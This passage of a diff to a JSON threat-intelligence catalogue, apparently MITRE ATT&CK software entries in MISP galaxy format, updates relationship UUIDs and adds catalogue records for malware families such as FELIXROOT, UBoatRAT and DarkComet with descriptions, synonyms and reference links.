"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21958,21 +24562,21 @@ "type": "uses" }, { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21985,12 +24589,103 @@ ], "type": "uses" }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "00806466-754d-44ea-ad6f-0caf59cb8556", @@ -22005,22 +24700,17 @@ ], "refs": [ "https://attack.mitre.org/software/S0267", - "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf" ], "synonyms": [ - "FELIXROOT" + "FELIXROOT", + "GreyEnergy mini" ] }, "related": [ { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22033,41 +24723,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -22076,7 +24731,14 @@ "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22090,7 +24752,28 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22102,6 +24785,69 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "cf8df906-179c-4a78-bd6e-6605e30f6624", @@ -22126,35 +24872,7 @@ }, "related": [ { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e2907cea-4b43-4ed7-a570-0fdf0fbeea00", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22168,7 +24886,28 @@ "type": "uses" }, { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e2907cea-4b43-4ed7-a570-0fdf0fbeea00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22180,6 +24919,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4b072c90-bc7a-432b-940e-016fc1c01761", @@ -22236,14 +24982,7 @@ }, "related": [ { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22257,14 +24996,21 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22285,21 +25031,21 @@ "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22313,14 +25059,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22334,7 +25080,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22361,7 +25107,7 @@ }, "related": [ { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22375,56 +25121,7 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22438,7 +25135,42 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22452,14 +25184,28 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22486,14 +25232,7 @@ }, "related": [ { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22506,20 +25245,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ @@ -22527,12 +25252,33 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4a98e44a-bd52-461e-af1e-a4457de87a36", @@ -22561,6 +25307,13 @@ ], "type": "uses" }, + { + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", "tags": [ @@ -22574,13 +25327,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "3c3b55a6-c3e9-4043-8aae-283fe96220c0", @@ -22618,14 +25364,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22639,7 +25378,14 @@ "type": "uses" }, { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22681,14 +25427,14 @@ "type": "uses" }, { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22715,7 +25461,7 @@ }, "related": [ { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22729,21 +25475,7 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22757,14 +25489,42 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22784,26 +25544,12 @@ ], "type": "uses" }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "c541efb4-e7b1-4ad6-9da8-b4e113f5dd42", @@ -22833,14 +25579,14 @@ "type": "uses" }, { - "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22876,7 +25622,2878 @@ ], "uuid": "23040c15-e7d8-47b5-8c16-8fd3e0e297fe", "value": "NotCompatible - S0299" + }, + { + "description": "[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)", + "meta": { + "external_id": "S0333", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0333", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/" + ], + "synonyms": [ + "UBoatRAT" + ] + }, + "related": [ + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "518bb5f1-91f4-4ff2-b09d-5a94e1ebe95f", + "value": "UBoatRAT - S0333" + }, + { + "description": "[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)", + "meta": { + "external_id": "S0334", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0334", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + ], + "synonyms": [ + "DarkComet", + "DarkKomet", + "Fynloski", + "Krademok", + "FYNLOS" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "value": 